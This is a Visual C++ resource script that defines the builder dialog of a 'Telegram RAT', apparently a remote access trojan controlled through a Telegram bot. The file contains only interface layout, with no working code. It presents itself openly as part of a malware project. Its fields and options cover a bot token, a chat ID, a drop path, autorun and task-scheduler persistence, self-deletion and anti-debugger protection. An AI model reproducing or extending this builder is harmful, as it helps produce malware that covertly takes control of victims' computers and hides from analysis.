// Microsoft Visual C++ generated resource script.
//
#include "resource.h"

#define APSTUDIO_READONLY_SYMBOLS
/////////////////////////////////////////////////////////////////////////////
//
// Generated from the TEXTINCLUDE 2 resource.
//
#include "winres.h"

/////////////////////////////////////////////////////////////////////////////
#undef APSTUDIO_READONLY_SYMBOLS

/////////////////////////////////////////////////////////////////////////////
// Русский (Россия) resources

#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_RUS)
LANGUAGE LANG_RUSSIAN, SUBLANG_DEFAULT
#pragma code_page(1251)

#ifdef APSTUDIO_INVOKED
/////////////////////////////////////////////////////////////////////////////
//
// TEXTINCLUDE
//

1 TEXTINCLUDE 
BEGIN
    "resource.h\0"
END

2 TEXTINCLUDE 
BEGIN
    "#include ""winres.h""\r\n"
    "\0"
END

3 TEXTINCLUDE 
BEGIN
    "\r\n"
    "\0"
END

#endif    // APSTUDIO_INVOKED


/////////////////////////////////////////////////////////////////////////////
//
// Dialog
//

IDD_DIALOGBAR DIALOGEX 0, 0, 274, 248
STYLE DS_SETFONT | DS_3DLOOK | DS_FIXEDSYS | DS_CENTERMOUSE | WS_POPUP | WS_BORDER
FONT 8, "MS Shell Dlg", 400, 0, 0x0
BEGIN
    LTEXT           "4B4DB4B3 Telegram RAT",IDC_STATIC,8,4,83,8
    CTEXT           "X",IDC_STATIC1,232,0,34,16,SS_NOTIFY | SS_CENTERIMAGE,WS_EX_STATICEDGE
    CTEXT           "_",IDC_STATIC2,191,0,35,16,SS_NOTIFY | SS_CENTERIMAGE,WS_EX_STATICEDGE
    LTEXT           "Enter the BOT API:",IDC_STATIC,8,32,63,8
    LTEXT           "Enter your CHAT ID:",IDC_STATIC,8,46,67,8
    LTEXT           "Enter output file name:",IDC_STATIC,8,61,76,8
    EDITTEXT        IDC_EDIT1,74,31,192,12,ES_AUTOHSCROLL | NOT WS_BORDER,WS_EX_STATICEDGE
    EDITTEXT        IDC_EDIT2,78,45,188,12,ES_AUTOHSCROLL | NOT WS_BORDER,WS_EX_STATICEDGE
    EDITTEXT        IDC_EDIT3,87,60,179,12,ES_AUTOHSCROLL | NOT WS_BORDER,WS_EX_STATICEDGE
    CTEXT           "Make my RAT",IDC_STATIC3,8,215,129,28,SS_NOTIFY | SS_CENTERIMAGE,WS_EX_STATICEDGE
    LTEXT           "Enter the drop path:",IDC_STATIC,8,76,67,8
    EDITTEXT        IDC_EDIT4,77,75,189,12,ES_AUTOHSCROLL | NOT WS_BORDER,WS_EX_STATICEDGE
    LTEXT           "Client delay (The more - low CPU load, but more delay to answers):",IDC_STATIC,8,91,224,8
    EDITTEXT        IDC_EDIT5,233,90,33,12,ES_AUTOHSCROLL | NOT WS_BORDER,WS_EX_STATICEDGE
    CONTROL         "Auto delete yourself before run",IDC_CHECK1,"Button",BS_AUTOCHECKBOX | WS_TABSTOP,8,137,118,10
    CONTROL         "Write yourself in autorun",IDC_CHECK2,"Button",BS_AUTOCHECKBOX | WS_TABSTOP,8,151,97,10
    LTEXT           "Enter the name in autorun:",IDC_STATIC,8,105,90,8
    EDITTEXT        IDC_EDIT6,101,104,165,12,ES_AUTOHSCROLL | NOT WS_BORDER,WS_EX_STATICEDGE
    CONTROL         "Drop and run yourself from [DROP PATH]",IDC_CHECK3,
                    "Button",BS_AUTOCHECKBOX | WS_TABSTOP,8,165,151,10
    CONTROL         "Protect from debuggers (By processes)",IDC_CHECK4,
                    "Button",BS_AUTOCHECKBOX | WS_TABSTOP,8,179,143,10
    CTEXT           "Test BOT API (Show commands)",IDC_STATIC4,137,215,129,28,SS_NOTIFY | SS_CENTERIMAGE,WS_EX_STATICEDGE
    CONTROL         "Write yourself in task scheduler",IDC_CHECK5,"Button",BS_AUTOCHECKBOX | WS_TABSTOP,8,192,119,10
    LTEXT           "Enter the name in taskschd:",IDC_STATIC,8,120,92,8
    EDITTEXT        IDC_EDIT7,101,119,165,12,ES_AUTOHSCROLL | NOT WS_BORDER,WS_EX_STATICEDGE
END


/////////////////////////////////////////////////////////////////////////////
//
// DESIGNINFO
//

#ifdef APSTUDIO_INVOKED
GUIDELINES DESIGNINFO
BEGIN
    IDD_DIALOGBAR, DIALOG
    BEGIN
        VERTGUIDE, 8
        VERTGUIDE, 137
        VERTGUIDE, 266
        BOTTOMMARGIN, 229
        HORZGUIDE, 16
        HORZGUIDE, 31
        HORZGUIDE, 243
    END
END
#endif    // APSTUDIO_INVOKED


/////////////////////////////////////////////////////////////////////////////
//
// AFX_DIALOG_LAYOUT
//

IDD_DIALOGBAR AFX_DIALOG_LAYOUT
BEGIN
    0
END

#endif    // Русский (Россия) resources
/////////////////////////////////////////////////////////////////////////////



#ifndef APSTUDIO_INVOKED
/////////////////////////////////////////////////////////////////////////////
//
// Generated from the TEXTINCLUDE 3 resource.
//


/////////////////////////////////////////////////////////////////////////////
#endif    // not APSTUDIO_INVOKED

